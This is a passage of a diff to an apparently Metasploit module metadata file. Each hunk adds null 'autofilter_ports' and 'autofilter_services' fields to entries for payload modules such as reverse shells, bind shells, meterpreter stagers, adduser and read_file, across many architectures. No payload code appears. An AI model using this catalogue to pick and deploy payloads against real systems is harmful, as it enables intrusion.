"/modules/payloads/singles/linux/mipsle/exec.rb", @@ -102190,6 +130662,8 @@ "platform": "Linux", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", @@ -102221,6 +130695,8 @@ "platform": "Linux", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb", @@ -102252,6 +130728,8 @@ "platform": "Linux", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb", @@ -102283,6 +130761,8 @@ "platform": "Linux", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb", @@ -102313,6 +130793,8 @@ "platform": "Linux", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/mipsle/reboot.rb", @@ -102343,6 +130825,8 @@ "platform": "Linux", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", @@ -102375,6 +130859,8 @@ "platform": "Linux", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb", @@ -102405,6 +130891,8 @@ "platform": "Linux", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb", @@ -102436,6 +130924,8 @@ "platform": "Linux", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb", @@ -102467,6 +130957,8 @@ "platform": "Linux", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb", @@ -102498,6 +130990,8 @@ "platform": "Linux", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb", @@ -102527,6 +131021,8 @@ "platform": "Linux", "arch": "ppc, cbea", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb", @@ -102556,6 +131052,8 @@ "platform": "Linux", "arch": "ppc, cbea", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/ppc/shell_find_port.rb", @@ -102585,6 +131083,8 @@ "platform": "Linux", "arch": "ppc, cbea", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb", @@ -102614,6 +131114,8 @@ "platform": "Linux", "arch": "ppc64, cbea64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb", @@ -102643,6 +131145,8 @@ "platform": "Linux", "arch": "ppc64, cbea64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/ppc64/shell_find_port.rb", @@ -102672,6 +131176,8 @@ "platform": "Linux", "arch": "ppc64, cbea64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb", @@ -102703,6 +131209,8 @@ "platform": "Linux", "arch": "ppc64le", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb", @@ -102734,6 +131242,8 @@ "platform": "Linux", "arch": "ppc64le", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb", @@ -102765,6 +131275,8 @@ "platform": "Linux", "arch": "ppc64le", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb", @@ -102796,6 +131308,8 @@ "platform": "Linux", "arch": "ppce500v2", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb", @@ -102827,6 +131341,8 @@ "platform": "Linux", "arch": "ppce500v2", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb", @@ -102858,6 +131374,8 @@ "platform": "Linux", "arch": "ppce500v2", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb", @@ -102887,6 +131405,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x64/exec.rb", @@ -102917,6 +131437,8 @@ "platform": "Linux,Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", @@ -102948,6 +131470,8 @@ "platform": "Linux,Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-05 16:30:19 +0000", "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", @@ -102979,6 +131503,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb", @@ -103010,6 +131536,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb", @@ -103041,6 +131569,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb", @@ -103070,6 +131600,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", @@ -103100,6 +131632,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-05 16:30:19 +0000", "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", @@ -103129,6 +131663,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp.rb", @@ -103158,6 +131694,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb", @@ -103187,6 +131725,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x64/shell_find_port.rb", @@ -103216,6 +131756,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb", @@ -103247,6 +131789,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/adduser.rb", @@ -103276,6 +131820,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/chmod.rb", @@ -103305,6 +131851,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/exec.rb", @@ -103336,6 +131884,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", @@ -103368,6 +131918,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", @@ -103398,6 +131950,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", @@ -103429,6 +131983,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", @@ -103461,6 +132017,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", @@ -103491,6 +132049,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", @@ -103521,6 +132081,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", @@ -103551,6 +132113,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", @@ -103583,6 +132147,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-15 08:02:51 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", @@ -103615,6 +132181,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-15 08:02:51 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", @@ -103646,6 +132214,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb", @@ -103677,6 +132247,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb", @@ -103708,6 +132280,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb", @@ -103737,6 +132311,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb", @@ -103766,6 +132342,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb", @@ -103795,6 +132373,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/read_file.rb", @@ -103826,6 +132406,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", @@ -103858,6 +132440,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", @@ -103887,6 +132471,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", @@ -103917,6 +132503,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", @@ -103948,6 +132536,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", @@ -103977,6 +132567,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", @@ -104007,6 +132599,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", @@ -104036,6 +132630,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", @@ -104067,6 +132663,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-15 08:02:51 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", @@ -104098,6 +132696,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-15 08:02:51 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", @@ -104127,6 +132727,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb", @@ -104156,6 +132758,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp.rb", @@ -104185,6 +132789,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb", @@ -104214,6 +132820,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x86/shell_find_port.rb", @@ -104243,6 +132851,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/shell_find_tag.rb", @@ -104273,6 +132883,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb", @@ -104302,6 +132914,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-23 13:38:25 +0000", "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb", @@ -104333,6 +132947,8 @@ "platform": "Linux", "arch": "zarch", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb", @@ -104364,6 +132980,8 @@ "platform": "Linux", "arch": "zarch", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb", @@ -104395,6 +133013,8 @@ "platform": "Linux", "arch": "zarch", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb", @@ -104424,6 +133044,8 @@ "platform": "Mainframe", "arch": "zarch", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/payloads/singles/mainframe/shell_reverse_tcp.rb", @@ -104453,6 +133075,8 @@ "platform": "Multi", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/multi/reverse_http.rb", @@ -104482,6 +133106,8 @@ "platform": "Multi", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/multi/reverse_https.rb", @@ -104511,6 +133137,8 @@ "platform": "Netware", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/netware/reverse_tcp.rb", @@ -104540,6 +133168,8 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-10-11 11:09:28 +0000", "path": "/modules/payloads/singles/nodejs/shell_bind_tcp.rb", @@ -104570,6 +133200,8 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp.rb", @@ -104600,6 +133232,8 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb", @@ -104629,6 +133263,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", @@ -104658,6 +133294,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", @@ -104687,6 +133325,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", @@ -104716,6 +133356,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", @@ -104745,6 +133387,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/armle/shell_bind_tcp.rb", @@ -104774,6 +133418,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb", @@ -104803,6 +133449,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/armle/vibrate.rb", @@ -104832,6 +133480,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/ppc/bind_tcp.rb", @@ -104861,6 +133511,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/ppc/find_tag.rb", @@ -104890,6 +133542,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/ppc/reverse_tcp.rb", @@ -104919,6 +133573,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb", @@ -104948,6 +133604,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb", @@ -104978,6 +133636,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", @@ -105008,6 +133668,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-01-10 15:06:08 +0000", "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", @@ -105038,6 +133700,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/exec.rb", @@ -105071,6 +133735,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", @@ -105104,6 +133770,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-01-10 15:06:08 +0000", "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", @@ -105135,6 +133803,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb", @@ -105166,6 +133836,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb", @@ -105197,6 +133869,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb", @@ -105226,6 +133900,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/say.rb", @@ -105255,6 +133931,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/shell_bind_tcp.rb", @@ -105284,6 +133962,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/shell_find_tag.rb", @@ -105313,6 +133993,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb", @@ -105342,6 +134024,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", @@ -105371,6 +134055,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", @@ -105402,6 +134088,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x86/exec.rb", @@ -105431,6 +134119,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", @@ -105460,6 +134150,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", @@ -105489,6 +134181,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/osx/x86/shell_bind_tcp.rb", @@ -105518,6 +134212,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/osx/x86/shell_find_port.rb", @@ -105547,6 +134243,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb", @@ -105576,6 +134274,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, 